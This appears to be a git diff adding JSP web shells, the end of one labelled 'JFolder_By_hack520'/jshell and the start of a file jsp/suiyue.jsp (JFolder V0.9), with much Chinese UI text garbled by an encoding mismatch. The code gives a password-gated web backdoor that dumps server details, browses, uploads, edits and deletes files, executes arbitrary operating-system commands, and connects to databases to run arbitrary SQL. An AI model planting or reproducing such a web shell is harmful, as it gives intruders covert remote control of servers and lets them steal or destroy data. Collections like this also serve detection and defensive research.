in.close(); + // + // ֽеõļָ + // + int i = 0; + byte[] seperator; + + while (inBytes[i] != 13) { + i ++; + } + + seperator = new byte[i]; + + for (i = 0; i < seperator.length; i ++) { + seperator[i] = inBytes[i]; + } + + // + // õHeader + // + String dataHeader = null; + i += 3; + start = i; + while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) { + i ++; + } + end = i - 1; + dataHeader = new String(inBytes, start, end - start + 1); + + // + // õļ + // + token = "filename=\""; + start = dataHeader.indexOf(token) + token.length(); + token = "\""; + end = dataHeader.indexOf(token, start) - 1; + filePath = dataHeader.substring(start, end + 1); + filePath = pathConvert(filePath); + String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); + + // + // õļݿʼλ + // + i += 4; + start = i; + + /* + boolean found = true; + byte[] tmp = new byte[seperator.length]; + while (i <= inBytes.length - 1 - seperator.length) { + + for (int j = i; j < i + seperator.length; j ++) { + if (seperator[j - i] != inBytes[j]) { + found = false; + break; + } else + tmp[j - i] = inBytes[j]; + } + + if (found) + break; + + i ++; + }*/ + + // + // ͵İ취 + // + end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; + + // + // Ϊļ + // + File newFile = new File(path + fileName); + newFile.createNewFile(); + FileOutputStream out = new FileOutputStream(newFile); + + //out.write(inBytes, start, end - start + 1); + out.write(inBytes, start, end - start + 1); + out.close(); + + sRet = "\n"; + } catch (IOException e) { + sRet = "\n"; + } + + sRet += ""; + return sRet; +} + +public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} + +public String getFileNameByPath(String path) { + String sRet = ""; + + path = pathConvert(path); + + if (path.lastIndexOf("/") != -1) { + sRet = path.substring(path.lastIndexOf("/") + 1); + } else { + sRet = path; + } + + return sRet; +} + +public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { + String sRet = ""; + int i; + + path = pathConvert(path); + dstPath = pathConvert(dstPath); + + for (i = 0; i < files2Copy.length; i ++) { + if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { + sRet += "ļ\"" + files2Copy[i] + "\"ʧ
          "; + } + } + + if (sRet.equals("")) { + sRet = "ļƳɹڷأԺ򡭡"; + sRet += ""; + } + + return sRet; +} + +public boolean isFileName(String fileName) { + boolean bRet = false; + + Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); + Matcher m = p.matcher(fileName); + + bRet = m.matches(); + + return bRet; +} + +public String renameFile(String path, String curUri, String file2Rename, String newName) { + String sRet = ""; + + path = pathConvert(path); + file2Rename = pathConvert(file2Rename); + + try { + File file = new File(file2Rename); + + newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; + File newFile = new File(newName); + + if (! file.exists()) { + sRet = "ļ\"" + file2Rename + "\""; + } else { + file.renameTo(newFile); + sRet = "ļɹڷأԺ򡭡"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "ȫ⵼ļ\"" + file2Rename + "\"ʧ"; + } + + return sRet; +} + +public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { + boolean bRet = true; + String driverName = ""; + + if (dbServer.equals("")) + dbServer = "localhost"; + + try { + if (dbType.equals("sqlserver")) { + driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; + if (dbPort.equals("")) + dbPort = "1433"; + _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("mysql")) { + driverName = "com.mysql.jdbc.Driver"; + if (dbPort.equals("")) + dbPort = "3306"; + _url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; + } else if (dbType.equals("odbc")) { + driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; + _url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; + } else if (dbType.equals("oracle")) { + driverName = "oracle.jdbc.driver.OracleDriver"; + _url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; + } else if (dbType.equals("db2")) { + driverName = "com.ibm.db2.jdbc.app.DB2Driver"; + _url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; + } + + Class.forName(driverName); + } catch (ClassNotFoundException e) { + bRet = false; + } + + return bRet; +} + +public boolean DBConnect(String User, String Password) { + boolean bRet = false; + + if (_url != null) { + try { + _dbConnection = DriverManager.getConnection(_url, User, Password); + _dbStatement = _dbConnection.createStatement(); + bRet = true; + } catch (SQLException e) { + bRet = false; + } + } + + return bRet; +} + +public String DBExecute(String sql) { + String sRet = ""; + + if (_dbConnection == null || _dbStatement == null) { + sRet = "ݿû"; + } else { + try { + if (sql.toLowerCase().substring(0, 6).equals("select")) { + ResultSet rs = _dbStatement.executeQuery(sql); + ResultSetMetaData rsmd = rs.getMetaData(); + int colNum = rsmd.getColumnCount(); + int colType; + + sRet = "sqlִгɹؽ
          \n"; + sRet += "\n"; + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + sRet += " \n"; + } + sRet += " \n"; + while (rs.next()) { + sRet += " \n"; + for (int i = 1; i <= colNum; i ++) { + colType = rsmd.getColumnType(i); + + sRet += " \n"; + } + sRet += " \n"; + } + sRet += "
          " + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")
          "; + switch (colType) { + case Types.BIGINT: + sRet += rs.getLong(i); + break; + + case Types.BIT: + sRet += rs.getBoolean(i); + break; + + case Types.BOOLEAN: + sRet += rs.getBoolean(i); + break; + + case Types.CHAR: + sRet += rs.getString(i); + break; + + case Types.DATE: + sRet += rs.getDate(i).toString(); + break; + + case Types.DECIMAL: + sRet += rs.getDouble(i); + break; + + case Types.NUMERIC: + sRet += rs.getDouble(i); + break; + + case Types.REAL: + sRet += rs.getDouble(i); + break; + + case Types.DOUBLE: + sRet += rs.getDouble(i); + break; + + case Types.FLOAT: + sRet += rs.getFloat(i); + break; + + case Types.INTEGER: + sRet += rs.getInt(i); + break; + + case Types.TINYINT: + sRet += rs.getShort(i); + break; + + case Types.VARCHAR: + sRet += rs.getString(i); + break; + + case Types.TIME: + sRet += rs.getTime(i).toString(); + break; + + case Types.DATALINK: + sRet += rs.getTimestamp(i).toString(); + break; + } + sRet += "
          \n"; + + rs.close(); + } else { + if (_dbStatement.execute(sql)) { + sRet = "sqlִгɹ"; + } else { + sRet = "sqlִʧ"; + } + } + } catch (SQLException e) { + sRet = "sqlִʧ"; + } + } + + return sRet; +} + +public void DBRelease() { + try { + if (_dbStatement != null) { + _dbStatement.close(); + _dbStatement = null; + } + + if (_dbConnection != null) { + _dbConnection.close(); + _dbConnection = null; + } + } catch (SQLException e) { + + } +} + +///////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +class JshellConfig { + private String _jshellContent = null; + private String _path = null; + + public JshellConfig(String path) throws JshellConfigException { + _path = path; + read(); + } + + private void read() throws JshellConfigException { + try { + FileReader jshell = new FileReader(new File(_path)); + char[] buffer = new char[1024]; + int nChars; + _jshellContent = ""; + + while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { + _jshellContent += new String(buffer, 0, nChars); + } + + jshell.close(); + } catch (IOException e) { + throw new JshellConfigException("ļʧ"); + } + } + + public void save() throws JshellConfigException { + FileWriter jshell = null; + + try { + jshell = new FileWriter(new File(_path)); + char[] buffer = _jshellContent.toCharArray(); + int start = 0; + int size = 1024; + + for (start = 0; start < buffer.length - 1 - size; start += size) { + jshell.write(buffer, start, size); + } + + jshell.write(buffer, start, buffer.length - 1 - start); + } catch (IOException e) { + new JshellConfigException("дļʧ"); + } finally { + try { + jshell.close(); + } catch (IOException e) { + + } + } + } + + public void setPassword(String password) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = p.matcher(password); + + if (! m.matches()) { + throw new JshellConfigException("벻гĸ»ַ"); + } + + p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); + m = p.matcher(_jshellContent); + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private String _password = \"" + password + "\""); + + //return HTMLEncode(_jshellContent); + } + + public void setEncodeType(String encodeType) throws JshellConfigException { + Pattern p = Pattern.compile("[A-Za-z0-9]+"); + Matcher m = p.matcher(encodeType); + + if (! m.matches()) { + throw new JshellConfigException("ʽֻĸֵ"); + } + + p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); + //return HTMLEncode(_jshellContent); + } + + public void setSessionTime(String sessionTime) throws JshellConfigException { + Pattern p = Pattern.compile("\\d+"); + Matcher m = p.matcher(sessionTime); + + if (! m.matches()) { + throw new JshellConfigException("sessionʱʱֻ"); + } + + p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ѾǷ޸"); + } + + _jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); + //return HTMLEncode(_jshellContent); + } + + public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { + Pattern p = Pattern.compile("\\w+"); + Matcher m = null; + int i; + String fileTypes = ""; + String tmpFileTypes = ""; + + for (i = 0; i < textFileTypes.length; i ++) { + m = p.matcher(textFileTypes[i]); + + if (! m.matches()) { + throw new JshellConfigException("չֻĸֺ»ߵ"); + } + + if (i != textFileTypes.length - 1) + fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; + else + fileTypes += "\"" + textFileTypes[i] + "\""; + } + + for (i = 0; i < _textFileTypes.length; i ++) { + if (i != _textFileTypes.length - 1) + tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; + else + tmpFileTypes += "\"" + _textFileTypes[i] + "\""; + } + + p = Pattern.compile(tmpFileTypes); + m = p.matcher(_jshellContent); + + if (! m.find()) { + throw new JshellConfigException("ļѾǷ޸"); + } + + _jshellContent = m.replaceAll(fileTypes); + + //return HTMLEncode(_jshellContent); + } + + public String getContent() { + return HTMLEncode(_jshellContent); + } +} + +class JshellConfigException extends Exception { + public JshellConfigException(String message) { + super(message); + } +} +%> + + +JFolder ͷ޸İ + + + + +<% +session.setMaxInactiveInterval(_sessionOutTime * 60); + +if (request.getParameter("password") == null && session.getAttribute("password") == null) { +// show the login form +//================================================================================================ +%> +
          + + + + +
          + + + + + + + + + + + + + + +
          8¼ :::...JFolder_By_hack520
          + + +
          +
          +<% +//================================================================================================ +// end of the login form +} else { + String password = null; + + if (session.getAttribute("password") == null) { + password = (String)request.getParameter("password"); + + if (validate(password) == false) { + out.println("
        • ѽù!
        • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } + + String action = null; + + + if (request.getParameter("action") == null) + action = "main"; + else + action = (String)request.getParameter("action"); + + if (action.equals("exit")) { + session.removeAttribute("password"); + response.sendRedirect(request.getRequestURI()); + out.close(); + return; + } + +// show the main menu +//==================================================================================== +%> + + + + + + + +
          + + +
          +<% +//===================================================================================== +// end of main menu + + if (action.equals("main")) { +// print the system info table +//======================================================================================= +%> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
          Ϣ
          <%=request.getServerName()%>
          ˿<%=request.getServerPort()%>
          ϵͳ<%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
          ǰû<%=System.getProperty("user.name")%>
          ǰûĿ¼<%=System.getProperty("user.home")%>
          ǰûĿ¼<%=System.getProperty("user.dir")%>
          ·<%=request.getRequestURI()%>
          ·<%=request.getRealPath(request.getServletPath())%>
          Э<%=request.getProtocol()%>
          汾Ϣ<%=application.getServerInfo()%>
          JDK汾<%=System.getProperty("java.version")%>
          JDKװ·<%=System.getProperty("java.home")%>
          JAVA汾<%=System.getProperty("java.vm.specification.version")%>
          JAVA<%=System.getProperty("java.vm.name")%>
          JAVA·<%=System.getProperty("java.class.path")%>
          JAVA·<%=System.getProperty("java.library.path")%>
          JAVAʱĿ¼<%=System.getProperty("java.io.tmpdir")%>
          JIT<%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
          չĿ¼·<%=System.getProperty("java.ext.dirs")%>
          ͻϢ
          ͻַ<%=request.getRemoteAddr()%>
          <%=request.getRemoteHost()%>
          û<%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
          ʽ<%=request.getScheme()%>
          Ӧðȫ׽ֲ<%=request.isSecure() == true ? "" : ""%>
          +<% +//======================================================================================= +// end of printing the system info table +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("filesystem")) { + String curPath = ""; + String result = ""; + String fsAction = ""; + + if (request.getParameter("curPath") == null) { + curPath = request.getRealPath(request.getServletPath()); + curPath = pathConvert((new File(curPath)).getParent()); + } else { + curPath = Unicode2GB((String)request.getParameter("curPath")); + } + + if (request.getParameter("fsAction") == null) { + fsAction = "list"; + } else { + fsAction = (String)request.getParameter("fsAction"); + } + + if (fsAction.equals("list")) + result = listFiles(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("browse")) { + result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); + result += browseFile(curPath); + } + else if (fsAction.equals("open")) + result = openFile(curPath, request.getRequestURI() + "?action=" + action); + else if (fsAction.equals("save")) { + if (request.getParameter("fileContent") == null) { + result = "ҳ浼"; + } else { + String fileContent = Unicode2GB((String)request.getParameter("fileContent")); + result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("createFolder")) { + if (request.getParameter("folderName") == null) { + result = "Ŀ¼Ϊ"; + } else { + String folderName = Unicode2GB(request.getParameter("folderName").trim()); + if (folderName.equals("")) { + result = "Ŀ¼Ϊ"; + } else { + result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); + } + } + } else if (fsAction.equals("createFile")) { + if (request.getParameter("fileName") == null) { + result = "ļΪ"; + } else { + String fileName = Unicode2GB(request.getParameter("fileName").trim()); + if (fileName.equals("")) { + result = "ļΪ"; + } else { + result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); + } + } + } else if (fsAction.equals("deleteFile")) { + if (request.getParameter("filesDelete") == null) { + result = "ûѡҪɾļ"; + } else { + String[] files2Delete = (String[])request.getParameterValues("filesDelete"); + if (files2Delete.length == 0) { + result = "ûѡҪɾļ"; + } else { + for (int n = 0; n < files2Delete.length; n ++) { + files2Delete[n] = Unicode2GB(files2Delete[n]); + } + result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); + } + } + } else if (fsAction.equals("saveAs")) { + if (request.getParameter("fileContent") == null) { + result = "ҳ浼"; + } else { + String fileContent = Unicode2GB(request.getParameter("fileContent")); + result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); + } + } else if (fsAction.equals("upload")) { + result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); + } else if (fsAction.equals("copyto")) { + if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { + result = "ûѡҪƵļ"; + } else { + String[] files2Copy = request.getParameterValues("filesDelete"); + String dstPath = request.getParameter("dstPath").trim(); + if (files2Copy.length == 0) { + result = "ûѡҪƵļ"; + } else if (dstPath.equals("")) { + result = "ûдҪƵĿ¼·"; + } else { + for (int i = 0; i < files2Copy.length; i ++) + files2Copy[i] = Unicode2GB(files2Copy[i]); + + result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); + } + } + } else if (fsAction.equals("rename")) { + if (request.getParameter("fileRename") == null) { + result = "ҳ浼"; + } else { + String file2Rename = request.getParameter("fileRename").trim(); + String newName = request.getParameter("newName").trim(); + if (file2Rename.equals("")) { + result = "ûѡҪļ"; + } else if (newName.equals("")) { + result = "ûдļ"; + } else { + result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); + } + } + } +%> + + + + + + + + + +
          ַ +
          <%= result.trim().equals("")?" " : result%>
          +<% +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("command")) { + String cmd = ""; + InputStream ins = null; + String result = ""; + + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command"); + result = exeCmd(cmd); + } +// print the command form +//======================================================================================== +%> + + + + + + + + + + + + +
          ִ
          + + +
          ִн
          + + + + +
          <%=result == "" ? " " : result%>
          +<% +//========================================================================================= +// end of printing command form +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("database")) { + String dbAction = ""; + String result = ""; + String dbType = ""; + String dbServer = ""; + String dbPort = ""; + String dbUsername = ""; + String dbPassword = ""; + String dbName = ""; + String dbResult = ""; + String sql = ""; + + if (request.getParameter("dbAction") == null) { + dbAction = "main"; + } else { + dbAction = request.getParameter("dbAction").trim(); + if (dbAction.equals("")) + dbAction = "main"; + } + + if (dbAction.equals("main")) { + result = " "; + } else if (dbAction.equals("dbConnect")) { + if (request.getParameter("dbType") == null || + request.getParameter("dbServer") == null || + request.getParameter("dbPort") == null || + request.getParameter("dbUsername") == null || + request.getParameter("dbPassword") == null || + request.getParameter("dbName") == null) { + response.sendRedirect(request.getRequestURI() + "?action=" + action); + } else { + dbType = request.getParameter("dbType").trim(); + dbServer = request.getParameter("dbServer").trim(); + dbPort = request.getParameter("dbPort").trim(); + dbUsername = request.getParameter("dbUsername").trim(); + dbPassword = request.getParameter("dbPassword").trim(); + dbName = request.getParameter("dbName").trim(); + + if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { + if (DBConnect(dbUsername, dbPassword)) { + if (request.getParameter("sql") != null) { + sql = request.getParameter("sql").trim(); + if (! sql.equals("")) { + dbResult = DBExecute(sql); + } + } + + result = "\n"; + result += "sql

           \n"; + + DBRelease(); + } else { + result = "ݿʧ"; + } + } else { + result = "ݿûҵ"; + } + } + } +%> + + + "> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
          ݿ + + +
          ݿַ
          ݿ˿
          ݿû
          ݿ
          ݿ
          <%=result%>
          + + + + +
          + <%=dbResult%> +
          +<% + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// + } else if (action.equals("config")) { + String cfAction = ""; + int i; + + if (request.getParameter("cfAction") == null) { + + cfAction = "main"; + } else { + cfAction = request.getParameter("cfAction").trim(); + if (cfAction.equals("")) + cfAction = "main"; + } + + if (cfAction.equals("main")) { +// start of config form +//========================================================================================== +%> + + + " onSubmit="javascript:selectAllTypes()"> + + + + + + + + + + + + + + + + + + + + +
          ϵͳ
          Sessionʱʱ
          ɱ༭ļ + + + + + + +
          + + + +

          + +
          + +
          +
          +<% + } else if (cfAction.equals("save")) { + if (request.getParameter("password") == null || + request.getParameter("encode") == null || + request.getParameter("sessionTime") == null || + request.getParameterValues("textFileTypes") == null) { + response.sendRedirect(request.getRequestURI()); + } + + String result = ""; + + String newPassword = request.getParameter("password").trim(); + String newEncodeType = request.getParameter("encode").trim(); + String newSessionTime = request.getParameter("sessionTime").trim(); + String[] newTextFileTypes = request.getParameterValues("textFileTypes"); + String jshellPath = request.getRealPath(request.getServletPath()); + + try { + JshellConfig jconfig = new JshellConfig(jshellPath); + jconfig.setPassword(newPassword); + jconfig.setEncodeType(newEncodeType); + jconfig.setSessionTime(newSessionTime); + jconfig.setTextFileTypes(newTextFileTypes); + jconfig.save(); + result += "ñɹڷأԺ򡭡"; + result += ""; + } catch (JshellConfigException e) { + result = "" + e.getMessage() + ""; + } + +%> + + + + +
          <%=result == "" ? " " : result%>
          +<% + } +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +//========================================================================================== +// end of config form + } else if (action.equals("about")) { +// start of about +//========================================================================================== +%> + + + + + + + +
          jshell v0.1
          -----Ȩ----------------̿͡-
          +<% +//========================================================================================== + } +} +%> + + + \ No newline at end of file diff --git a/jsp/suiyue.jsp b/jsp/suiyue.jsp new file mode 100644 index 0000000..1c63947 --- /dev/null +++ b/jsp/suiyue.jsp @@ -0,0 +1,993 @@ +<% +/** +JFolder V0.9 windows platform +@Filename JFolder.jsp +@Description һ򵥵ϵͳļĿ¼ʾԴṩļܽ + +@Bugs : ʱļ޷ʾ123456789 +*/ +%> +<%@ page contentType="text/html;charset=gb2312"%> +<%@page import="java.io.*,java.util.*,java.net.*" %> +<%! +private final static int languageNo=0; //԰汾0 : ģ 1Ӣ +String strThisFile="JFolder.jsp"; +String[] authorInfo={" -Ȩ̿- "," Thanks for your support - - by Syue http://www.syue.com "}; +String[] strFileManage = {" ","File Management"}; +String[] strCommand = {"CMD ","Command Window"}; +String[] strSysProperty = {"ϵ ͳ ","System Property"}; +String[] strHelp = {" ","Help"}; +String[] strParentFolder = {"ϼĿ¼","Parent Folder"}; +String[] strCurrentFolder= {"ǰĿ¼","Current Folder"}; +String[] strDrivers = {"","Drivers"}; +String[] strFileName = {"ļ","File Name"}; +String[] strFileSize = {"ļС","File Size"}; +String[] strLastModified = {"޸","Last Modified"}; +String[] strFileOperation= {"ļ","Operations"}; +String[] strFileEdit = {"޸","Edit"}; +String[] strFileDown = {"","Download"}; +String[] strFileCopy = {"","Move"}; +String[] strFileDel = {"ɾ","Delete"}; +String[] strExecute = {"ִ","Execute"}; +String[] strBack = {"","Back"}; +String[] strFileSave = {"","Save"}; + +public class FileHandler +{ + private String strAction=""; + private String strFile=""; + void FileHandler(String action,String f) + { + + } +} + +public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } +} + +public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } +} + +// A Class with methods used to process a ServletInputStream +public class HttpMultiPartParser { + + private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } +if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + byte b; + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } +} //End of class HttpMultiPartParser + +String formatPath(String p) +{ + StringBuffer sb=new StringBuffer(); + for (int i = 0; i < p.length(); i++) + { + if(p.charAt(i)=='\\') + { + sb.append("\\\\"); + } + else + { + sb.append(p.charAt(i)); + } + } + return sb.toString(); +} + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String htmlEncode(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } 